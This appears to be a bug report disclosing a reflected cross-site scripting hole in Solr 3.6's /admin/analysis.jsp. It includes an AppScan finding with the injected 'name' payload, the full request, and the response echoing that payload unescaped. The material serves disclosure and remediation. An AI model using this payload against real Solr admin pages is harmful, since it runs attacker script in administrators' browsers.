XSS vulnerability in Solr /admin/analysis.jsp

This issue was found when running solr 3.6 in solaris, in a multicore setup. Each core had a cross site scripting vulnerability found at /admin/analysis.jsp while testing using IBM Rational AppScan 8.5.0.1.

Here are the details of the scan result as given by IBM Rational AppScan:

[1 of 1] Cross-Site Scripting
Severity: High
Test Type: Application
Vulnerable URL: https://<server>/solr/<core>/admin/analysis.jsp (Parameter: name)
CVE ID(s): N/A
CWE ID(s): 79 (parent of 83)
Remediation Tasks: Review possible solutions for hazardous character injection
Variant 1 of 6 [ID=19389]
The following changes were applied to the original request:
• Set parameter 'name's value to '" onMouseOver=alert(39846)//'
Request/Response:
12/10/2012 3:33:04 PM 16/187
POST /solr/<core>/admin/analysis.jsp HTTP/1.1
Cookie: JSESSIONID=0D77846A894B8BB086394C396F19D0E9
Content-Length: 96
Accept: /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64;
Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
Media Center PC 6.0; Tablet PC 2.0)
Host: <server>:8443
Content-Type: application/x-www-form-urlencoded
Referer: https://<server>/solr/<core>/admin/analysis.jsp?highlight=on
nt=type&name=" onMouseOver=alert
(39846)//&verbose=on&highlight=on&val=1234&qverbose=on&qval=1234
HTTP/1.1 200 OK
Content-Length: 1852
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Date: Mon, 10 Dec 2012 15:54:38 GMT
<html>
<head>
<script>
var host_name="<server>"
</script>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="solr-admin.css">
<link rel="icon" href="favicon.ico" type="image/ico"></link>
<link rel="shortcut icon" href="favicon.ico" type="image/ico"></link>
<title>Solr admin page</title>
</head>
<body>
<a href="."><img border="0" align="right" height="78" width="142"
src="solr_small.png" alt="Solr"></a>
<h1>Solr Admin (Cares)
</h1>
<server><br/>
cwd=/export/home/kh SolrHome=/solr/<core>/
<br/>
12/10/2012 3:33:04 PM 17/187
HTTP caching is ON
<br clear="all">
<h2>Field Analysis</h2>
<form method="POST" action="analysis.jsp" accept-charset="UTF-8">
<table>
<tr>
<td>
<strong>Field
<select name="nt">
<option >name</option>
<option selected="selected">type</option>
</select></strong>
</td>
<td>
<input class="std" name="name" type="text" value="" onMouseOver=alert(39846)//">
</td>
</tr>
<tr>
<td>
<strong>Field value (Index)</strong>
<br/>
verbose output
<input name="verbose" type="checkbox"
checked="true" >
<br/>
highlight matches
<input name="highlight" type="checkbox"
checked="true" >
</td>
<td>
<textarea class="std" rows="8" cols="70" name="val">1234</textarea>
</td>
</tr>
<tr>
<td>
<strong>Field value (Query)</strong>
<br/>
verbose output
<input name="qverbose" type="checkbox"
checked="true" >
</td>
<td>
<textarea class="std" rows="1" cols="70" name="qval">1234</textarea>
</td>
</tr>
<tr>
<td>
</td>
<td>
<input class="stdbutton" type="submit" value="analyze">
</td>
</tr>
</table>
</form>
<strong>Unknown Field Type: " onMouseOver=alert(39846)//</strong>
</body>
</html>
12/10/2012 3:33:04 PM 18/187
Validation In Response:
• option>
<option selected="selected">type</option>
</select></strong>
</td>
<td>
<input class="std" name="name" type="text" value="" onMouseOver=alert
(39846)//">
</td>
</tr>
<tr>
<td>
<strong>Field value (Index)</strong>
<br/>
verbose output
<inp
Reasoning:
The test successfully embedded a script in the response, which will be executed once the user
activates the OnMouseOver function (i.e., hovers with the mouse cursor over the vulnerable
control). This means that the application is vulnerable to Cross-Site Scripting attacks.
CWE ID:
83 (child of 79)
Vulnerable URL: https://<server>/solr/<core>/admin/threaddump.jsp
Total of 1 security issues in this URL